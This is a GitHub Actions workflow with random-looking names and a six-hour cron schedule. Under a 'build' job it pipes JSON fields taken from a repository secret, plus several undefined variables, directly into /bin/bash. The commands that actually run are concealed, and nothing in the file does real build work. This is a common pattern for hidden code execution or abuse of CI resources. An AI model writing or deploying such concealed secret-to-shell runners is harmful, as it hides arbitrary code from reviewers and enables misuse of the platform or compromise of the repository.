name: gulingwu7565

on:
  workflow_dispatch:
  schedule:
    - cron: '36 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: gulingwu7565
        env:
          bluk22: ${{ secrets.bluk22 }}
        run: |
          echo $bluk22 | jq -r .guypl67878 | /bin/bash
          echo $nz7 | jq -r .mrc9872 | /bin/bash
          echo $mcxxp9 | jq -r .t6605 | /bin/bash
          echo $l92 | jq -r .qmfio26 | /bin/bash
          echo $makz9 | jq -r .mlh2 | /bin/bash

